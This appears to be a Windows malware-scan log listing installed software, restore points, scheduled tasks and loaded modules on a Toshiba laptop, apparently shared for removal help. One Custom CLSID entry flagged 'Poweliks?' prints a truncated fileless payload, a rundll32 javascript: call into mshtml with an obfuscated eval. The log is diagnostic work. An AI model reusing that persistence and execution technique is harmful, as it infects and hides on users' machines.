Catalyst Control Center Graphics Full Existing (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Full New (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Light (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center InstallProxy (Version: 2010.0315.1050.17562 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (Version: 2010.0315.1050.17562 - ATI) Hidden
CCC Help Chinese Standard (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Chinese Traditional (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Czech (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Danish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Dutch (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help English (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Finnish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help French (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help German (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Greek (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Hungarian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Italian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Japanese (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Korean (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Norwegian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Polish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Portuguese (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Russian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Spanish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Swedish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Thai (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Turkish (Version: 2010.0315.1049.17562 - ATI) Hidden
ccc-core-static (Version: 2010.0315.1050.17562 - ATI) Hidden
ccc-utility (Version: 2010.0315.1050.17562 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 3.05 - Piriform)
Cisco EAP-FAST Module (HKLM\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Conexant Audio Driver For AMD HDMI Codec (HKLM\...\CNXT_AUDIO_HDA_HDMI) (Version: 4.98.26.0 - Conexant)
Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 4.119.0.61 - Conexant)
Corel WinDVD (HKLM\...\{5C1F18D2-F6B7-4242-B803-B5A78648185D}) (Version: 10.0.5.822 - Corel Inc.)
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{132D27B8-C656-44BD-8C16-73C54EA8A85F}) (Version:  - Microsoft)
Intel® Management Engine Components (HKLM\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.8.0.1003 - Intel Corporation)
Intel® Turbo Boost Technology Driver (HKLM\...\{D6C630BF-8DBB-4042-8562-DC9A52CB6E7E}) (Version: 01.01.01.1007 - Intel Corporation)
iTunes (HKLM\...\{881F5DE8-9367-4B81-A325-E91BBC6472F9}) (Version: 10.1.1.4 - Apple Inc.)
Java™ 6 Update 17 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216017FF}) (Version: 6.0.170 - Sun Microsystems, Inc.)
Junk Mail filter update (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
LSI V92 MOH Application (HKLM\...\LTMOH) (Version:  - LSI Corporation)
Malwarebytes' Anti-Malware (HKLM\...\Malwarebytes' Anti-Malware_is1) (Version:  - Malwarebytes Corporation)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6012.5000 - Microsoft Corporation) Hidden
Microsoft Choice Guard (Version: 2.0.48.0 - Microsoft Corporation) Hidden
Microsoft IntelliPoint 8.0 (HKLM\...\{00F93853-D9D3-4795-A89E-84CCBA0205C9}) (Version: 8.0.225.0 - Microsoft)
Microsoft Office 2003 Web Components (HKLM\...\{90A40409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office 2007 Primary Interop Assemblies (HKLM\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office Access MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Converter Pack (HKLM\...\{6EECB283-E65F-40EF-86D3-D51BF02A8D43}) (Version: 11.0.0.0 - Microsoft Corporation - Office Resource Kit Group)
Microsoft Office Excel MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Home and Student 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office OneNote MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Single Image 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Small Business Connectivity Components (HKLM\...\{A939D341-5A04-4E0A-BB55-3E65B386432D}) (Version: 2.0.7024.0 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Office Word MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Security Client (Version: 4.5.0216.0 - Microsoft Corporation) Hidden
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.5.216.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2005 Express Edition (MSSMLBIZ) (Version: 9.4.5000.00 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Express Edition (SQLEXPRESS) (Version: 9.4.5000.00 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Tools Express Edition (Version: 9.4.5000.00 - Microsoft Corporation) Hidden
Microsoft SQL Server Native Client (HKLM\...\{7670D32F-DAE6-4E49-8C8B-B3F08B5B1686}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{E7084B89-69E0-46B3-A118-8F99D06988CD}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
MSVCRT (Version: 14.0.1468.721 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PhotoScape (HKLM\...\PhotoScape) (Version:  - )
PlayReady PC Runtime x86 (HKLM\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
QuickTime (HKLM\...\{57752979-A1C9-4C02-856B-FBB27AC4E02C}) (Version: 7.69.80.9 - Apple Inc.)
Realtek USB 2.0 Card Reader (HKLM\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30111 - Realtek Semiconductor Corp.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (Version:  - Microsoft) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.0.8.1 - Synaptics Incorporated)
System Requirements Lab for Intel (HKLM\...\{CD41B576-4787-4D5C-95EE-24A4ABD89CD3}) (Version: 4.4.24.0 - Husdawg, LLC)
TeamViewer 6 (HKLM\...\TeamViewer 6) (Version: 6.0.17222 - TeamViewer GmbH)
TOSHIBA ConfigFree (HKLM\...\{607BE7BF-7C28-4ADB-A4A0-385962B901C3}) (Version: 8.0.28 - TOSHIBA Corporation)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.2 - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM\...\InstallShield_{53536479-DFB0-47ED-9D10-43F3708C222D}) (Version: 1.2.10.0 - TOSHIBA Corporation)
TOSHIBA eco Utility (Version: 1.2.10.0 - TOSHIBA Corporation) Hidden
TOSHIBA Hardware Setup (HKLM\...\{8E9CEA3B-EBD1-439C-A01D-830CB39613C6}) (Version: 2.00.06 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.0.6 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (Version: 3.1.0.6 - TOSHIBA Corporation) Hidden
TOSHIBA Media Controller (HKLM\...\{C7A4F26F-F9B0-41B2-8659-99181108CDE3}) (Version: 1.0.80.3 - TOSHIBA CORPORATION)
TOSHIBA Media Controller Plug-in (HKLM\...\{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}) (Version: 1.0.5.10 - TOSHIBA CORPORATION)
TOSHIBA Recovery Media Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.0.4 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.2.9 - TOSHIBA)
TOSHIBA Software Modem (HKLM\...\TOSHIBA Software Modem) (Version: 2.2.97 - LSI Corporation)
TOSHIBA Speech System Applications (HKLM\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version: 1.00.2518 - )
TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version:  - )
TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version:  - )
TOSHIBA Supervisor Password (HKLM\...\{073B89C3-BA88-41B5-965F-B35A88EAE838}) (Version: 2.00.03 - TOSHIBA Corporation)
TOSHIBA Value Added Package (HKLM\...\InstallShield_{FEDD27A0-B306-45EF-BF58-B527406B42C8}) (Version: 1.3.3 - TOSHIBA Corporation)
TOSHIBA Value Added Package (Version: 1.3.3 - TOSHIBA Corporation) Hidden
TOSHIBA Web Camera Application (HKLM\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.1.1.15 - TOSHIBA Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2600217) (Version: 1 - Microsoft Corporation)
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}) (Version:  - Microsoft)
Update for Microsoft Excel 2010 (KB2837600) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4ACD847E-547D-493F-9A86-F73EAE1B5174}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2494150) (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{3FCFD88F-4D13-4F38-8625-ABABEA7F61EA}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{287A1E92-9E41-4BC1-8920-B3D0E9220800}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9D69691D-823D-4C3E-9B12-563A3F520366}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687502) 32-Bit Edition (HKLM\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.SingleImage_{7DE7DF97-82FE-4B3A-AB8D-1621F9CC464A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{5AA578BB-759C-40FD-9661-A737C0884541}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F1A20C69-9FE5-40FD-9CD5-84EABC2EF64A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0D672F7-883E-4279-8E75-D97A5445AB46}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.SingleImage_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.SingleImage_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM\...\{90140000-0018-0409-0000-0000000FF1CE}_Office14.SingleImage_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}) (Version:  - Microsoft)
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{7B29D8B8-6A87-496C-A65E-B935E740448A}) (Version:  - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{38CF30E4-3348-4BD1-A859-B630C355A56F}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2880529) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B9B89E01-5B6B-4F73-BC34-B2C0D8ACB4CD}) (Version:  - Microsoft)
Windows Live Call (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Communications Platform (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live Essentials (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (HKLM\...\{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Mail (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Messenger (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Movie Maker (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live Sync (HKLM\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Windows Live Writer (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-931387415-1679961563-2565028958-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
 
==================== Restore Points  =========================
 
07-09-2014 01:28:19 Windows 7 Service Pack 1
07-09-2014 11:17:53 Windows Update
08-09-2014 02:19:37 Windows Update
08-09-2014 11:25:59 Windows Update
09-09-2014 06:43:28 Installed Adblock Plus for IE (32-bit)
09-09-2014 06:56:14 Malwarebytes Anti-Rootkit Restore Point
09-09-2014 19:00:13 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-14 10:04 - 2009-06-11 05:39 - 00000824 ____A C:\windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {0600C6CD-339E-40E5-837D-772661A93D2E} - System32\Tasks\{47BE60EA-15BF-417B-8455-8082DD3AA6C9} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {0B0DCD61-E65B-41BD-87A5-E3FF4E52896D} - System32\Tasks\{2E3D8B46-8C0C-4CE5-BD72-9EA8BF2819A4} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {0E809153-173D-4501-9AA3-E3299B8E4EEB} - System32\Tasks\{6446B742-20A7-4A87-91FB-1DAF36B20FDE} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {131204F4-96CD-4DA3-BE7A-816280B2F3AB} - System32\Tasks\{88F08FA9-BE71-4A64-979B-251F068C947A} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {3655B183-5D27-422D-9FD5-CB1638615759} - System32\Tasks\{35038549-A0E9-41DD-B0FC-39A9B0A1194D} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {48A8BE75-28FC-45FC-A2E4-BFBF99AB848F} - System32\Tasks\{E274B4A1-AFB4-49EA-BF80-7ACE438DC09F} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {67B5FCE5-D76F-44AC-A382-B1B5E874D085} - System32\Tasks\{3B5FF27F-F004-4707-A208-EAF4518D4AC7} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {69ACD1BB-0C0D-4370-BBB9-8E8D07A61169} - System32\Tasks\Microsoft_Hardware_Launch_IPoint_exe => c:\Program Files\Microsoft IntelliPoint\IPoint.exe [2010-07-21] (Microsoft Corporation)
Task: {77F07B0E-D155-4273-A665-FD20F9C0B9B7} - System32\Tasks\ConfigFree Startup Programs => C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe [2010-02-23] (TOSHIBA CORPORATION)
Task: {81532BAB-54D1-4201-941B-AF6D56C850A4} - System32\Tasks\{F810B7E8-5B48-4A60-BF3B-7EED4E944DA3} => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.EXE [2009-09-04] (CANON INC.)
Task: {8987DC76-A8B3-49B2-A0BB-072667F6A7AE} - System32\Tasks\{0443CAD0-DB77-4C07-86A1-3FE551E42396} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
Task: {976A4408-8F64-4C97-B073-CD2D16E60C09} - \{08BD5BC0-2D8E-7335-9F1F-3215372B580F} No Task File <==== ATTENTION
Task: {9ECA6E1B-A776-4C9B-B04A-A87D8E24AFAB} - System32\Tasks\{DC76CA08-A16E-427C-ABBC-3E5C759C3EA6} => C:\Program Files\Canon\MP Navigator EX 3.1\mpnex31.exe [2009-11-09] (CANON INC.)
Task: {A264B53A-C76E-4EF8-A314-785501361D1E} - System32\Tasks\{9D54E60D-393D-4FD2-96B6-96A73B3AF2D9} => C:\Program Files\Canon\MP Navigator EX 3.1\mpnex31.exe [2009-11-09] (CANON INC.)
Task: {B714418F-4FFB-4571-BE0E-0838A402499C} - System32\Tasks\Adobe Flash Player Updater => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2013-04-27] (Adobe Systems Incorporated)
Task: {CE67E4A0-0B09-4CF4-8D12-2080226E2384} - System32\Tasks\{928F0CFC-9063-46E2-BD07-C6585B0230DC} => C:\Program Files\Canon\MP Navigator EX 3.1\mpnex31.exe [2009-11-09] (CANON INC.)
Task: {E331DF70-0764-4282-9BBA-EEB4DE041C73} - System32\Tasks\{F687F45B-D1DB-4FA4-BD38-ED30604C0A48} => C:\Program Files\Canon\IJ Manual\Easy Guide Viewer\cmview.exe [2009-08-06] (CANON INC.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
 
==================== Loaded Modules (whitelisted) =============
 
2006-12-04 01:25 - 2006-12-04 01:25 - 00022723 _____ () C:\windows\System32\sugs2l3.dll
2010-03-04 05:14 - 2010-03-04 05:14 - 08783160 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll
2009-11-04 04:26 - 2009-11-04 04:26 - 00058680 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnZ.dll
2010-03-04 05:14 - 2010-03-04 05:14 - 00016184 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF10.dll
2010-03-04 05:14 - 2010-03-04 05:14 - 00016184 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF11.dll
2009-03-13 10:08 - 2009-03-13 10:08 - 00049152 _____ () C:\Program Files\Toshiba\PCDiag\NotifyPCD.dll
2009-07-26 02:07 - 2009-07-26 02:07 - 00058704 _____ () C:\Program Files\TOSHIBA\TOSHIBA Disc Creator\NotifyTDC.dll
2010-11-17 13:16 - 2010-11-17 13:16 - 00067872 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2009-10-14 01:00 - 2009-10-14 01:00 - 00016384 ____R () C:\Program Files\ATI Technologies\ATI.ACE\Branding\Branding.dll
2010-11-03 08:46 - 2010-11-03 08:46 - 00270336 _____ () C:\windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2013-01-11 18:27 - 2013-01-11 18:27 - 00172544 _____ () C:\windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\72d7ad1c7236c618e32950b49869a26b\IsdiInterop.ni.dll
2011-12-01 10:49 - 2011-10-17 15:08 - 00059904 _____ () C:\Program Files\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\Users\hesperia\Documents\failure notice.eml:OECustomProperty
